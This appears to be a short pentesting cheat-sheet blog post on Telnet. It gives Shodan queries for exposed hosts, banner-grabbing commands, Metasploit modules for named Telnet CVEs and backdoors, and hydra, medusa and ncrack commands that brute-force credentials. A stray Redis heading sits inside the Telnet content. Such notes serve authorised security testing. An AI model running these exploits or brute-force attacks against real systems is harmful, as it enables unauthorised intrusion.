
Telnet Pentesting Best Practices

Telnet

Telnet usually uses ports 23 and 992.

What is Telnet?

Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines.

PORT     STATE SERVICE               VERSION
23/tcp   open  telnet  

Redis Password Authentication Bruteforcing Methods

#Metasploit Framework
msf> use auxiliary/scanner/redis/redis_login

Telnet Pentesting

Shodan search query:
port:23
# You can use this command only on your shodan-cli:
shodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000
telnet 10.10.x.x 23
nc 10.10.x.x 23
# Nmap: banner
nc -vn 10.10.x.x 23
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 10.10.x.x
msf > use auxiliary/scanner/telnet/telnet_version
msf > use auxiliary/scanner/telnet/lantronix_telnet_version

Telnet version grabbing with Metasploit module.

Connection Tools

Linux:

telnet -l username 10.10.x.x 23

Windows:

  • PuTTY

Telnet Vulnerabilities

Specific Vulnerabilities and Exploits

#BOF: FreeBSD 7.3 – 9.0; MIT Kerberos v5 Applications (krb5-appl) <= 1.0.2; Heimdal <= 1.5.1; GNU inetutils [CVE-2011-4862]
msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf > use exploit/linux/telnet/telnet_encrypt_keyid
msf > use exploit/freebsd/telnet/telnet_encrypt_keyid

#SenNet Optimal DataLogger <= V5.37c-1.43c; SenNet Solar Datalogger <= V5.03-1.56a; SenNet Multitask Meter <= V5.21a-1.18b [CVE-2017-6048] [TCP/5000]
msf > use auxiliary/scanner/telnet/satel_cmd_exec

#RuggedCom Rugged Operating System (ROS) Telnet backdoor [CVE-2012-1803]
#Exploit-DB: 18779.txt
msf > use auxiliary/scanner/telnet/telnet_ruggedcom

#Lantronix Device Server V5.8.0.1 [UDP/30718]
msf > use auxiliary/scanner/telnet/lantronix_telnet_password

There are also product-based vulnerabilities and scripts for vulnerabilities.

IBM CICS:

#Nmap Scripts:
nmap --script=cics-enum -p 23 10.10.x.x
nmap --script=cics-user-enum -p 23 10.10.x.x

IBM TN3270:

#Nmap Scripts:
nmap --script tn3270-info,tn3270-screen 10.10.x.x

Telnet Credentials

Brute Forcing

hydra -t 2 -L users.list -P passwords.list -M TargetIPs.list -s 23 telnet
medusa -t 2 -T 2 -U users.list -P passwords.list -H TargetIPs.list -n 23 -M telnet
ncrack -g CL=2 -U users.list -P passwords.list -iL TargetIPs.list -p telnet:23 -oA Result.txt
msf > use auxiliary/scanner/telnet/telnet_login
This post is licensed under CC BY 4.0 by the author.


Powered by 0xhav0c © 2022